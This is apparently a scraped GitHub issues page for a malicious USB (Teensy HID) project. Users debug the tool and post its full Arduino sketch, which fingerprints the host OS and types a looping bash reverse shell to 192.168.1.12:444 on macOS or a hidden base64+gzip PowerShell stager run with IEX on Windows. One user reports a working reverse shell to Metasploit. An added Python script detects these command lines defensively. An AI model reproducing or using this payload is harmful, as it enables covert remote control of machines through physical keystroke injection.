ebursztein / malusb
Malicious USB
License: GNU Lesser General Public License v3.0
The Windows payload relies on Windows somehow automatically entering the payload in a command window or in the 'Run' program. However, this is not how Windows works.
When the USB drive gets inserted and it starts to send out the payload keystrokes, it will result in nothing, or at the very best a focused text box receiving these keystrokes. (A similar issue has been reported for Mac.)
To fix this on Windows, send a Windows key + R key combination before the payload to open the Run dialog.
The code executes on Windows and OS X as expected; however, I do not get any sessions on the attacking machine after having set up a listener with the osx/x64x/reverse_shell_tcp handler.
I've been trying to run the code on OSX, but when I plug in the Teensy, Spotlight opens and the commands are typed into it, causing it to fail. I inserted the Teensy while a web browser was open on the computer.
I created a payload_configured.c and copy-pasted the code into Arduino. When I hit Verify to upload it to the Teensy 3.2, it throws the following errors:
[code]
Arduino: 1.6.11 (Linux), TD: 1.30, Board: "Teensy 3.2 / 3.1, Serial + Keyboard + Mouse + Joystick, 96 MHz optimize speed (overclock), US English"
/root/Arduino/custommalusb1/custommalusb1.ino:20:27: warning: missing terminating " character [enabled by default]
const char* OSX_PAYLOAD = "(nohup bash -c \"while true;do bash -i >& /dev/tcp/192.168.1.12/444 0>&1 2>&1; sleep 1;done\" 1>/dev/null &)
^
custommalusb1:20: error: missing terminating " character
const char* OSX_PAYLOAD = "(nohup bash -c \"while true;do bash -i >& /dev/tcp/192.168.1.12/444 0>&1 2>&1; sleep 1;done\" 1>/dev/null &)
^
/root/Arduino/custommalusb1/custommalusb1.ino:21:1: warning: missing terminating " character [enabled by default]
";
^
custommalusb1:21: error: missing terminating " character
/root/Arduino/custommalusb1/custommalusb1.ino:22:28: warning: missing terminating " character [enabled by default]
const char* WIN_PAYLOAD = "powershell -exec bypass -nop -W hidden -noninteractive -Command \"& {$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIALRP5FcAA41S0WrbMBR991doRhsyjoUdwugCKts8bwRKaupAH0Igtnyp3chSkOQmoe2/V04T
^
custommalusb1:22: error: missing terminating " character
const char* WIN_PAYLOAD = "powershell -exec bypass -nop -W hidden -noninteractive -Command \"& {$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIALRP5FcAA41S0WrbMBR991doRhsyjoUdwugCKts8bwRKaupAH0Igtnyp3chSkOQmoe2/V04T
^
/root/Arduino/custommalusb1/custommalusb1.ino:29:53: warning: missing terminating ' character [enabled by default]
k3c9EeL9514Yi0sZGfpX9KZxqu4zcZoKZeBYvAGau6rY2wIAAA=='));$t=(New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();IEX $t }\";exit";
^
custommalusb1:29: error: missing terminating ' character
k3c9EeL9514Yi0sZGfpX9KZxqu4zcZoKZeBYvAGau6rY2wIAAA=='));$t=(New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();IEX $t }\";exit";
^
custommalusb1:22: error: expected primary-expression before 'const'
const char* WIN_PAYLOAD = "powershell -exec bypass -nop -W hidden -noninteractive -Command \"& {$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIALRP5FcAA41S0WrbMBR991doRhsyjoUdwugCKts8bwRKaupAH0Igtnyp3chSkOQmoe2/V04T
^
custommalusb1: In function 'void win_payload()':
custommalusb1:366: error: 'WIN_PAYLOAD' was not declared in this scope
type_command(WIN_PAYLOAD);
^
missing terminating " character
This report would have more information with
"Show verbose output during compilation"
option enabled in File -> Preferences.
[/code]
This is the payload code:
[code]
/*
* Malicious HID USB payload
* https://github.com/LightWind/malusb
*
* Malicious chimera HID payload that creates a background reverse shell to the server of your choice
* Works both on Windows and OSX. See the README to know how to configure it.
*
* @see: https://www.elie.net/malusb for more information on HID spoofing devices.
* @authors Elie Bursztein ([email protected]), Jean Michel Picod ([email protected])
* @licence: GPL v3
*/
#include <stdio.h>
/////////////////////////////////////////////////
/// Reverse shell payloads
/////////////////////////////////////////////////
/* These payload stubs need to be replaced with actual payloads to work */
const char* OSX_PAYLOAD = "(nohup bash -c \"while true;do bash -i >& /dev/tcp/192.168.1.12/444 0>&1 2>&1; sleep 1;done\" 1>/dev/null &)
";
const char* WIN_PAYLOAD = "powershell -exec bypass -nop -W hidden -noninteractive -Command \"& {$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIALRP5FcAA41S0WrbMBR991doRhsyjoUdwugCKts8bwRKaupAH0Igtnyp3chSkOQmoe2/V04T
GH0I1ZPu1TlH5+oo14qDMejZw52qewGG/SSBhzmbwy66rR6BW1QcjIWOzsHSQvENWEMXaZ6KFqQl
fvJjTJPvVzShydgfTSYTRzcMc/oPbGE1lJ0TXFYHC8vVClcspnQcu/Xy9Tl+9XDNyNLC3lKQXNWt
fFhNp7+KdDYLBoHfjmaIf9/KWu0MytUOdNGAEEj3Ujo0Kg3qDWjkhxjk03TYy7KD0EdKnptcddve
ng/WMpOP6vCFruVa+oNbeq9bCwTXo3iEa3oD8sE2wSe95YW7hrg6ulG8tK2SAc1L24T+9SXxXdMK
IAS3zEHuoKwJrgZEdUYEKJKA4sBz2WT/xxEtDluYu1HOwSwGi0df2cmnh/8wnJ0ScPVJu3V+NozM
5JPaQJTtt9pl7wyjKFVdV8oa4RqNr78l6AXd9jZ6JzuSYHgTXpoU+R7eM4JBa6WX8eqjwLFPuYBS
k3c9EeL9514Yi0sZGfpX9KZxqu4zcZoKZeBYvAGau6rY2wIAAA=='));$t=(New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();IEX $t }\";exit";
/////////////////////////////////////////////////
/// Internal constants
/////////////////////////////////////////////////
#define NUMLOCK 1
#define CAPSLOCK 2
#define SCROLLLOCK 4
#define LED_PIN 11 // Teensy pin for the led.
#define LOCK_KEY CAPSLOCK // Key used for testing end of command execution. NUMLOCK or CAPSLOCK or SCROLLLOCK.
#define LOCK_CHECK_WAIT_MS 100 // Time between lock checks in ms
#define LOCK_ATTEMPTS 10 // attempts to load the driver
#define DELAY 500 // delay between command
/////////////////////////////////////////////////
/// Lock related functions
/////////////////////////////////////////////////
/*!
* Check the state of the lock key used for locking mechanism.
*/
boolean is_locked(void) {
if ((keyboard_leds & LOCK_KEY) == LOCK_KEY) {
return true;
} else {
return false;
}
}
/*!
* Toggle the selected locked key stats.
*/
void toggle_lock(void) {
unsigned short k;
switch(LOCK_KEY) {
case NUMLOCK:
k = KEY_NUM_LOCK;
break;
case CAPSLOCK:
k = KEY_CAPS_LOCK;
break;
case SCROLLLOCK:
k = KEY_SCROLL_LOCK;
break;
default:
break;
}
set_key(1, k);
type_keys();
}
/*!
* reset lock to unlock
*/
void reset_lock(void) {
if (is_locked()) {
toggle_lock();
}
}
/////////////////////////////////////////////////
/// Utility functions
/////////////////////////////////////////////////
/*
* Fingerprint OSX vs Win/Linux based on the fact that OSX doesn't have a Num Lock / Scroll Lock state
* Idea: Try to toggle, and if there is no change then it is OSX, else Win or Linux
*/
boolean is_osx() {
int status1 = 0; //LED status before toggle
int status2 = 0; //LED status after toggle
unsigned short sk = NUMLOCK;
// Get status
status1 = ((keyboard_leds & sk) == sk) ? 1 : 0;
delay(DELAY);
//Toggle
set_key(1, sk);
type_keys();
// Get status
status2 = ((keyboard_leds & sk) == sk) ? 1 : 0;
clear_keys();
is_done();
if (status1 == status2) {
return true;
} else {
return false;
}
}
void set_modifier(unsigned short m) {
Keyboard.set_modifier(m);
}
/*!
* Set keyboard key values
* @param position: the position of the key in [1, 6]
* @param value: the key value
*/
void set_key(unsigned short position, unsigned short value) {
switch(position) {
case 1:
Keyboard.set_key1(value);
break;
case 2:
Keyboard.set_key2(value);
break;
case 3:
Keyboard.set_key3(value);
break;
case 4:
Keyboard.set_key4(value);
break;
case 5:
Keyboard.set_key5(value);
break;
case 6:
Keyboard.set_key6(value);
break;
default:
break;
}
}
/*!
* Type the given key combination
* type/write the keys, clear and wait to be successful
* @return if the command succeeded or not
*/
void type_keys(void) {
Keyboard.send_now();
clear_keys();
delay(DELAY);
}
/*!
* Type a command line including "ENTER"
* type/write the keys, clear and wait to be successful
* @return if the command succeeded or not
*/
void type_command(const char* cmd) {
Keyboard.print(cmd);
Keyboard.send_now();
delay(DELAY);
Keyboard.println("");
Keyboard.send_now();
delay(DELAY * 4);
clear_keys();
}
/*!
* clear keyboard
* return true if successful
*/
void clear_keys (void){
// reset all keys
for (int i = 1; i < 7; i++)
set_key(i, 0);
// reset modifier
set_modifier(0);
Keyboard.send_now();
delay(DELAY);
}
/*!
* Wait until the drivers are loaded and the Teensy is active.
*
* The idea behind this is to try to get the onboard light to blink
* and then try to lock our lock key. If both succeed then we are ready
*
* @note: Idea from Offsec Peensy code
*/
void wait_for_drivers(void) {
//until we are ready
for(int i = 0; i < LOCK_ATTEMPTS && (!is_locked()); i++) {
digitalWrite(LED_PIN, HIGH);
digitalWrite(LED_PIN, LOW);
delay(LOCK_CHECK_WAIT_MS);
toggle_lock();
}
// maybe it is seen as a new keyboard, evading
if (!is_locked()) {
osx_close_windows();
}
//resetting lock
reset_lock();
delay(100);
}
/*!
* Check if a command is successful by testing the lock key
*/
void is_done (void) {
//for(int i = 0; i < LOCK_ATTEMPTS && (!is_locked()); i++) {
boolean current_lock = is_locked();
toggle_lock();
while(is_locked() == current_lock) {
delay(LOCK_CHECK_WAIT_MS);
}
reset_lock();
}
/////////////////////////////////////////////////
/// Payload functions
/////////////////////////////////////////////////
/*
char* build_payload(const char* payload_template) {
bzero(payload_osx, PAYLOAD_OSX_SIZE);
snprintf(payload_osx, PAYLOAD_OSX_SIZE, payload_template, MSF_IP, MSF_PORT);
return payload_osx;
}
*/
/////////////////////////////////////////////////
/// OSX functions
/////////////////////////////////////////////////
/** quit the active application (Cmd+Q) **/
void osx_close_windows(void) {
set_modifier(MODIFIERKEY_RIGHT_GUI);
set_key(1, KEY_Q);
type_keys();
}
/** open spotlight application to launch other apps **/
void osx_open_spotlight(void) {
set_modifier(MODIFIERKEY_RIGHT_GUI);
set_key(1, KEY_SPACE);
type_keys();
}
void osx_hide_windows(void) {
// minimize background windows
set_modifier(MODIFIERKEY_RIGHT_GUI | MODIFIERKEY_ALT);
set_key(1, KEY_H);
type_keys();
// minimize active windows
set_modifier(MODIFIERKEY_RIGHT_GUI | MODIFIERKEY_ALT);
set_key(1, KEY_M);
type_keys();
// minimize active windows
set_modifier(MODIFIERKEY_RIGHT_GUI | MODIFIERKEY_ALT);
set_key(1, KEY_M);
set_key(2, KEY_H);
type_keys();
}
/** OSX payload delivery **/
void osx_exec_payload(void) {
//hide all the window
osx_hide_windows();
//spotlight
osx_open_spotlight();
//terminal
type_command("terminal");
//payload
type_command(OSX_PAYLOAD);
//cleanup
osx_close_windows();
}
/////////////////////////////////////////////////
/// Windows functions
/////////////////////////////////////////////////
/*
* Fingerprinting technique using powershell
* @credit NFC
*
*/
bool fingerprint_windows(void) {
int status1 = 0; //LED status before toggle
int status2 = 0; //LED status after toggle
unsigned short sk = SCROLLLOCK;
// Get status
status1 = ((keyboard_leds & sk) == sk) ? 1 : 0;
delay(DELAY);
//Asking windows to set SCROLLLOCK
win_open_execute();
type_command("powershell -Command \"(New-Object -ComObject WScript.Shell).SendKeys('{SCROLLLOCK}')\"");
delay(DELAY);
// Get status
status2 = ((keyboard_leds & sk) == sk) ? 1 : 0;
is_done();
if (status1 != status2) {
return true;
} else {
return false;
}
}
void win_open_execute(void) {
// Windows key + R
set_modifier(MODIFIERKEY_GUI);
set_key(1, KEY_R);
type_keys();
}
void win_payload(void) {
// open the Run prompt
win_open_execute();
//cmd
type_command("cmd");
//run payload
type_command(WIN_PAYLOAD);
}
/*
* Main function
*/
void setup() {
//wait until the key is up and ready
wait_for_drivers();
clear_keys();
if (fingerprint_windows() == true) {
win_payload();
} else {
osx_exec_payload();
}
}
/*
* Code that needs to be executed repeatedly goes here
* @note: not used, since the payload is a one-time execution.
*/
void loop() {}
[/code]
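A defender-side check for the Windows activity the posted sketch generates (the Scroll Lock probe sent through WScript.Shell SendKeys, and the hidden, base64+gzip PowerShell stager typed into cmd from the Run dialog). This is an added example, not code from the project or from any post here; the record format, labels, weights and sample events are assumptions constructed for the example.

```python
import re

# Patterns taken from the fingerprint command and Windows payload in the posted sketch; weights are assumed.
INDICATORS = [
    (r"WScript\.Shell.*SendKeys\('\{(?:SCROLLLOCK|NUMLOCK|CAPSLOCK)\}'\)",
     "lock-key toggle via SendKeys (HID device fingerprinting the OS)", 3),
    (r"-exec\s+bypass", "ExecutionPolicy bypass", 1),
    (r"-nop\b", "no profile", 1),
    (r"-W\s+hidden", "hidden window", 1),
    (r"-noninteractive", "non-interactive", 1),
    (r"FromBase64String\(.*GzipStream", "base64+gzip in-memory stager", 2),
    (r"\bIEX\b|Invoke-Expression", "Invoke-Expression of decoded text", 2),
]
POWERSHELL = re.compile(r"powershell(?:\.exe)?$", re.IGNORECASE)

def score_event(event):
    """Return (score, reasons) for one process-creation record."""
    score, reasons = 0, []
    for pattern, label, weight in INDICATORS:
        if re.search(pattern, event["cmdline"], re.IGNORECASE):
            score += weight
            reasons.append(label)
    # Typed keystrokes land in the Run dialog (parent explorer.exe) or in the
    # cmd.exe it opened, so PowerShell from either parent gets a nudge.
    if POWERSHELL.search(event["image"]) and event["parent"].lower().endswith(("explorer.exe", "cmd.exe")):
        score += 1
        reasons.append("PowerShell started from Run dialog or console")
    return score, reasons

def triage(events, threshold=3):
    """Return records scoring at or above the threshold, highest score first."""
    hits = [dict(score=s, reasons=why, cmdline=ev["cmdline"])
            for ev in events for s, why in [score_event(ev)] if s >= threshold]
    return sorted(hits, key=lambda h: -h["score"])

# Constructed process-creation records (not real captures); the base64 blob from the page is a placeholder.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell -Command \"(New-Object -ComObject WScript.Shell).SendKeys('{SCROLLLOCK}')\""},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "powershell -exec bypass -nop -W hidden -noninteractive -Command \"& {$s=New-Object IO.MemoryStream(,"
                "[Convert]::FromBase64String('<BASE64-PLACEHOLDER>'));$t=(New-Object IO.StreamReader(New-Object "
                "IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();IEX $t }\";exit"},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "powershell -Command Get-Date"},
]
```

Running `triage(SAMPLE_EVENTS)` flags the stager (score 9) and the lock-key probe (score 4) and ignores the plain `Get-Date` call; the probe alone is the earliest host-side signal, since it fires before any payload is typed.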
Hello,
thank you for your great work!
I was testing your HID exploit on my Windows 10 machine and it successfully spawned a reverse shell on my Linux machine running Metasploit.
The only problem I have is that my shell is not persistent (as it should be, right?). After rebooting my Windows 10 PC, the shell isn't connecting back. I have to plug in the Teensy again to get a new shell.
Did I do something wrong while compiling and loading it onto my Teensy? Is it a Windows 10 problem?
Or did I misunderstand the "persistent" part? I thought the shell would try to reconnect periodically.
Greetings!